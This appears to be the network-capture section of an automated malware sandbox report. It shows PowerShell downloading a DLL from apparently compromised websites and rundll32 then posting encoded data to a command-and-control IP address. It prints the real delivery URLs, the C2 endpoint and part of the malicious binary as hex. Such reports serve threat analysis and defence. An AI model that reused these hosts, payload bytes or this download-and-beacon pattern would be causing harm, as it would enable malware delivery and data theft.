6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-
Jan 6, 2021 15:48:58.263387918 CET	9	IN	Data Raw: 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 Data Ascii: width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors
Jan 6, 2021 15:48:58.263444901 CET	10	IN	Data Raw: 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 Data Ascii: f-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source
Jan 6, 2021 15:48:58.263499975 CET	11	IN	Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="
Jan 6, 2021 15:48:58.263537884 CET	11	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	209.59.139.39	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 15:48:58.606726885 CET	12	OUT	GET /content/5f18Q/ HTTP/1.1 Host: veterinariadrpopui.com Connection: Keep-Alive
Jan 6, 2021 15:48:58.767659903 CET	13	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 06 Jan 2021 14:48:58 GMT Server: Apache Content-Length: 7309 Connection: close Content-Type: text/html Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>
Jan 6, 2021 15:48:58.767731905 CET	15	IN	Data Raw: 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a Data Ascii:
Jan 6, 2021 15:48:58.767774105 CET	16	IN	Data Raw: 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 Data Ascii:
Jan 6, 2021 15:48:58.767812967 CET	17	IN	Data Raw: 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii:
Jan 6, 2021 15:48:58.767872095 CET	19	IN	Data Raw: 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 Data Ascii:
Jan 6, 2021 15:48:58.767923117 CET	20	IN	Data Raw: 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	210.86.239.69	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 15:49:01.492264986 CET	21	OUT	GET /wordpress/CGMC/ HTTP/1.1 Host: khanhhoahomnay.net Connection: Keep-Alive
Jan 6, 2021 15:49:01.778521061 CET	22	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jan 2021 14:49:01 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=60 X-Powered-By: PHP/7.4.9 Set-Cookie: 5ff5cddddff0a=1609944541; expires=Wed, 06-Jan-2021 14:50:01 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Wed, 06 Jan 2021 14:49:01 GMT Expires: Wed, 06 Jan 2021 14:49:01 GMT Content-Disposition: attachment; filename="rJGdausK.dll" Content-Transfer-Encoding: binary Data Raw: 31 64 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
Jan 6, 2021 15:49:01.778556108 CET	23	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U
Jan 6, 2021 15:49:01.778568029 CET	25	IN	Data Raw: cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 00 03 de 6a 14 53 Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1y
Jan 6, 2021 15:49:01.778579950 CET	26	IN	Data Raw: 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f 85 c0 74 0e 68 00 Data Ascii: ut\|~tN@(jjQ~t:W39~~Ftv(PF$G;~\|F_thjPFthjPVjxPt^]UEHMx\|ujl3]PxDUEtztSVuWuB;r]+rr Z$3
Jan 6, 2021 15:49:01.778594971 CET	28	IN	Data Raw: 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 00 01 0c 18 8b 07 Data Ascii: ]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPFN
Jan 6, 2021 15:49:01.778606892 CET	29	IN	Data Raw: 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 08 00 00 00 00 8b Data Ascii: ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3
Jan 6, 2021 15:49:01.778621912 CET	29	IN	Data Raw: 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 50 ff 91 bc 00 00 Data Ascii: ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWX
Jan 6, 2021 15:49:01.778634071 CET	30	IN	Data Raw: 32 30 30 30 0d 0a d3 00 10 bf 05 00 00 00 90 56 8b cb e8 c8 01 00 00 83 c6 0c 4f 75 f2 8b cb e8 1b 00 00 00 8b cb e8 74 03 00 00 8b 45 fc 5f 5e 5b 8b e5 5d c3 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 5c a1 58 21 01 10 33 c5 89 45 fc 8b c1 8d Data Ascii: 2000VOutE_^[]3[]U\X!3EME@QEhPLEEVURPQ %W39}SlEUREWPQEEURhPEUWRfEf
Jan 6, 2021 15:49:01.778650045 CET	32	IN	Data Raw: f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 f6 79 86 8b c6 8b Data Ascii: xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRPv
Jan 6, 2021 15:49:01.778666973 CET	33	IN	Data Raw: 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b f0 85 f6 7e 0b 0f Data Ascii: x=wuz3fEuPujPS~xLju=jh\|WthWuhWtjM_^3[R]UX!3EES]VEW}
Jan 6, 2021 15:49:02.052279949 CET	35	IN	Data Raw: 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76 Data Ascii: ^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v\|ovfsvs~vf;u

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	5.2.136.90	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 15:49:18.053646088 CET	223	OUT	POST /04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/ Content-Type: multipart/form-data; boundary=--------rL4XtnE8 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 7412 Connection: Keep-Alive Cache-Control: no-cache
Jan 6, 2021 15:49:18.053714991 CET	224	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 4c 34 58 74 6e 45 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 6c 4d 72 65 42 61 6c 70 78 76 22 3b 20 66 69 6c 65 6e 61 6d 65 Data Ascii: ----------rL4XtnE8Content-Disposition: form-data; name="qlMreBalpxv"; filename="IsdvnY"Content-Type: application/octet-streamTfpI8N5A5IE8>PmoQ_[#YwA_8z@r#_V{7:rBt
Jan 6, 2021 15:49:18.125998974 CET	228	OUT	Data Raw: 17 58 6f 8c ed a4 32 c3 98 ac 2f 2c 75 9b 97 96 a0 2b f6 6c ef 2c 64 65 da 96 4c 41 67 58 ee 85 e6 84 e5 ce 38 b1 28 0b 46 c3 93 41 40 38 42 98 cd 51 51 61 27 87 c6 1d 4c 9b e7 b5 8a 5d cd 78 ed 35 f8 88 a3 6b 8d 8b d5 e9 50 b9 dc 63 ec 3a d3 2d Data Ascii: Xo2/,u+l,deLAgX8(FA@8BQQa'L]x5kPc:-qi[L)HA)sLYk0zuy/%%v{mCW3y->t@\|rwy/oLYT@QxheJJ5b=lI[LG?Tz
Jan 6, 2021 15:49:18.198899984 CET	230	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 6, 2021 15:49:19.007164955 CET	232	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jan 2021 14:49:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 61 34 34 0d 0a 8a d1 03 64 93 55 9a 71 6c 2f ba 03 7d 22 53 1a 16 a1 3a 96 c7 db 89 31 03 1a a9 ac ba b4 12 34 80 7a cc f6 a0 1c 21 09 46 40 48 2f f2 bf 2c 49 aa 12 42 4a a1 1d d6 46 a3 06 bf d6 e2 38 45 f7 7f af 36 02 8b 15 60 93 d5 0f bb 56 20 ca fc 4a 57 64 9f 34 cb cc f9 fa 19 85 ac 09 dc 8d e7 1b e8 e8 eb 0d 7f 9b 6c 72 76 28 4f ad 1b 77 b3 88 1e 9e bc 23 57 49 c9 e5 41 ae 5e 0f 93 d0 80 32 80 da f5 06 5a 98 e2 6e e6 7e ea 13 f8 29 ab c4 32 93 09 ca 6d e0 34 ba 73 81 a8 28 6d ca 9d 80 e2 11 d8 69 b8 64 10 03 c9 e6 a8 7a 08 13 95 07 c2 7b bb aa 70 3d cd 74 9e c4 06 8a 93 79 3f ba ae 9d 55 26 1e 69 31 ef 9e b9 d8 3d 9a 72 e6 9c a6 a2 e7 8d 1d b4 1d a9 71 b6 06 18 d9 19 24 2a c8 4e ff c1 2d 72 ef 1f f6 e9 8c 6b 22 07 87 e5 f1 f8 28 8c bb 51 8f d4 2d 2f 6f 23 34 6d 2f 63 cd ea 21 14 a9 83 3f 08 18 03 da be be d8 8f b6 43 6b fe 8a 99 5f 79 59 b5 25 e8 e5 66 0d 28 70 d2 6d 66 23 e6 6b 5e 2b 22 5b 5d 9b 0c c0 ff 21 01 d5 43 35 76 2b bd 4f ad 41 d5 1c 54 92 c3 31 0c db b0 a8 de 4d b0 28 b9 51 20 65 f6 74 a4 cd 6e 64 00 b8 ba ba 55 58 2f 64 2f f3 19 45 92 83 26 33 22 01 a2 46 d7 12 13 98 77 84 91 54 f7 37 2e e6 e5 d1 f7 40 ae c5 08 83 73 ce ed 52 2a c7 c2 4f a0 49 26 62 36 54 a8 a9 a6 3b 69 37 e2 04 ad c2 a2 24 4a 77 64 74 d7 5f 9f f1 61 b3 bb 73 4a bd 3f 8e 25 9e a7 b6 1f 41 f1 24 c2 be f5 c4 a1 a3 49 8c 5b fd 8f 74 d5 3f ef aa 60 6d 0b 03 83 99 ed 1d f0 1d 23 3f 44 44 e8 db 94 0c e2 9d 25 3d 6f da ee 8f 2f 58 d7 66 7f d2 d1 39 3d 01 18 5c 37 93 e6 19 f4 f2 83 77 c3 bc 81 18 9e 35 e9 c8 10 05 1f 32 a2 58 9b 70 e0 da c0 49 ff 26 5d 8b 7f f0 c5 83 f3 22 4b d8 99 52 e4 f6 f6 5f 5a a1 64 73 52 fd 5a db 3f 49 ad 49 a8 25 a3 00 4c 29 9e a5 11 61 c5 0d fd f1 0f 2f de 2e e4 b8 02 45 e6 5d 55 15 fa cc 04 c8 ce f9 9a f5 2e d2 2d f7 ea 83 07 24 0f 04 7d 33 f9 1a 76 12 fc 85 b7 ff 53 12 db f5 8c 19 74 1c a1 d6 dd 7f 51 e7 51 1f a3 02 9a ab d8 a6 b4 93 dc bc 24 4a 65 33 4f 9e 4e bb 5f 2e c1 74 01 e1 22 d9 65 a4 fa c7 3a c0 5a 75 01 3a b7 7d ea b4 a6 d5 6b 6e 88 5b 0c 8f 4c 48 92 a5 b6 d5 de 60 7c 79 13 48 77 81 51 55 be f5 90 74 cf be dc d7 44 cf ff aa 02 c4 37 95 44 28 b6 e8 d1 96 9a 0b 42 ea 89 71 a2 ea 1e e0 f4 3c 79 af d4 ef 91 18 75 72 8e 40 96 94 64 de fc b3 68 51 9a 41 80 fe 80 be 4b 9c 0c 85 95 5b 9d 0a e6 9b 1b 11 d2 8d e9 4f 9e 33 19 02 6c 39 7a 8f 67 b5 15 1c a4 8a f6 6d cd 9f 5a 0e 70 93 3a 62 c6 a5 ad 2c c2 c9 94 78 04 92 a0 0c 6a 84 ad 3b 7f 41 c5 f0 83 0f dd ef 40 8c 5c 56 f5 82 f8 e0 83 2f 9e 85 4b a8 d0 57 3c a4 44 2a e4 1d 56 af 29 4f a2 fb b9 7d 5c d1 27 e5 70 9f 0b e6 40 42 07 0c 42 7f 19 74 95 c1 35 dc 2d a0 44 6e 73 63 13 ad d1 e5 20 30 fb 89 6e 78 61 92 56 38 da 38 36 0e c3 df 6b 06 7e 4f fc fe f5 ea 30 ad c5 57 be 8b f4 ab a1 ba eb d3 e8 da f4 a2 60 b6 a3 c0 94 d3 cc 65 b0 34 b9 4f af 5c fb fd 86 cd a0 88 a2 0e b4 08 77 b3 74 5d 17 70 ca de 8f 